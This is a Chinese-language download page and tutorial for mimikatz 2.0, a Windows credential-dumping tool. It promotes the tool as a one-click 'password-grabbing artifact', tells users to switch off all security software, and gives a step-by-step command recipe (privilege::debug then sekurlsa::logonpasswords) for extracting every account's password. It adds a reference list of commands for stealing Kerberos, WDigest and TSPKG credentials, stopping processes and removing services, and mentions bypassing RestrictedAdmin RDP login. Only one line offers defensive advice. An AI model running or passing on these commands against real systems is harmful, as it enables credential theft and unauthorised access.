mimikatz2.0是一個(gè)簡單且好用的windows密碼抓取神器，它可幫助用戶一鍵抓取window密碼，其具有操作簡單、使用方便等特點(diǎn)。新版能夠通過獲取的kerberos登錄憑據(jù)，繞過支持RestrictedAdmin模式的win8或win2012svr的遠(yuǎn)程終端(RDP) 的登陸認(rèn)證。建議默認(rèn)禁止RestrictedAdmin模式登錄。使用mimikatz2.0請關(guān)閉本機(jī)所有的安全軟件，因?yàn)槠鋵儆诤诳统绦?，安全軟件不退出就無法運(yùn)行。

使用教程

獲取windows密碼的方法很簡單，mimikatz2.0版本的只需要兩條命令就可以了：
1、首先打開mimikatz2.0，該版本分為32位和64位，用戶可根據(jù)自己計(jì)算機(jī)的操作系統(tǒng)進(jìn)行相應(yīng)選擇，若不知道自己的操作系統(tǒng)位數(shù)，請鼠標(biāo)右鍵點(diǎn)擊“計(jì)算機(jī)”-“屬性”，在系統(tǒng)類型中即可知曉
2、打開之后先輸入privilege::debug //提升權(quán)限
2、再輸入sekurlsa::logonpasswords //抓取密碼
3、獲取本機(jī)的所有賬號的Windows密碼

mimikatz命令

一、常規(guī)的操作使用命令
1.mimikatz # cls -->清屏,類似dos命令cls
2.mimikatz # exit -->退出mimikatz
3.mimikatz #version -->查看當(dāng)前的mimikatz的版本
二、系統(tǒng)方面的操作使用命令:system
1.mimikatz #system::user -->查看當(dāng)前登錄的系統(tǒng)用戶
2.mimikazt #system::computer -->返回當(dāng)前的計(jì)算機(jī)名稱
三、在服務(wù)器終端的操作命令: ts
1.mimikatz #ts::sessions -->顯示當(dāng)前的會(huì)話
2.mimikatz #ts::processes windows-d.vm.nirvana.local -->顯示服務(wù)器的進(jìn)程和對應(yīng)的pid情況等
四、系統(tǒng)服務(wù)相關(guān)的操作使用命令:service
五、系統(tǒng)進(jìn)程相關(guān)操作的使用命令:process
六、系統(tǒng)線程相關(guān)操作使用命令:thread
七、系統(tǒng)句柄相關(guān)操作使用命令:handle
八、加密相關(guān)操作使用命令:crypto
九、注入操作使用命令:inject
十、其他基礎(chǔ)命令
1.cls清屏
2.exit退出
3.version查看mimikatz的版本
4.help查看幫助信息
5.system::user查看當(dāng)前登錄的系統(tǒng)用戶
6.system::computer查看計(jì)算機(jī)名稱
7.process::list列出進(jìn)程
8.process::suspend進(jìn)程名稱 暫停進(jìn)程
9.process::stop進(jìn)程名稱 結(jié)束進(jìn)程
10.process::modules列出系統(tǒng)的核心模塊及所在位置
11.service::list列出系統(tǒng)的服務(wù)
12.service::remove移除系統(tǒng)的服務(wù)
13.service::start stop服務(wù)名稱 啟動(dòng)或停止服務(wù)
14.privilege::list列出權(quán)限列表
15.privilege::enable激活一個(gè)或多個(gè)權(quán)限
16.privilege::debug提升權(quán)限
17.nogpo::cmd打開系統(tǒng)的cmd.exe
18.nogpo::regedit打開系統(tǒng)的注冊表
19.nogpo::taskmgr打開任務(wù)管理器
20.ts::sessions顯示當(dāng)前的會(huì)話
21.ts::processes顯示進(jìn)程和對應(yīng)的pid情況等
22.sekurlsa::wdigest獲取本地用戶信息及密碼
23.sekurlsa::wdigest獲取kerberos用戶信息及密碼
24.sekurlsa::tspkg獲取tspkg用戶信息及密碼
25.sekurlsa::logonPasswords獲登陸用戶信息及密碼